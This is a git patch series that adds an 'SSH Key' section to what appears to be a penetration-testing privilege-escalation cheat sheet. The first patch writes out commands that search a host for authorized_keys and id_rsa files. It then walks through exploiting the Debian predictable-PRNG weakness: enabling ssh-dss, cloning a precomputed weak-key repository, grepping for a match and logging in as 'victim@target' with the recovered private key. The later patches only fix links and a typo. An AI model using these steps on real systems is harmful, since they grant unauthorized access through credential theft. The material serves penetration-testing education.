From 2e507a2b2f82d03151a872c058377efca5d1cebf Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 15:55:10 +0200 Subject: [PATCH 1/3] Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process --- .../Linux - Privilege Escalation.md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 26847cb..d7a9237 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -182,6 +182,61 @@ $ locate password | more ... ``` +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + ## Scheduled tasks ### Cron jobs @@ -697,3 +752,4 @@ https://www.exploit-db.com/exploits/18411 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) From 14d03b96a1608e5c13592b3850a21dcd858226d6 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 16:00:31 +0200 Subject: [PATCH 2/3] Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process - Summary --- Methodology and Resources/Linux - Privilege Escalation.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d7a9237..d7a1d78 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -10,6 +10,9 @@ * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](##sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) From 7c8e9ac4ce1d36ff0eec7ce4cd4922e6690632b3 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 16:01:49 +0200 Subject: [PATCH 3/3] Typo --- Methodology and Resources/Linux - Privilege Escalation.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d7a1d78..ae1705c 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -11,7 +11,7 @@ * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) * [SSH Key](#ssh-key) - * [Sensitive files](##sensitive-files) + * [Sensitive files](#sensitive-files) * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs)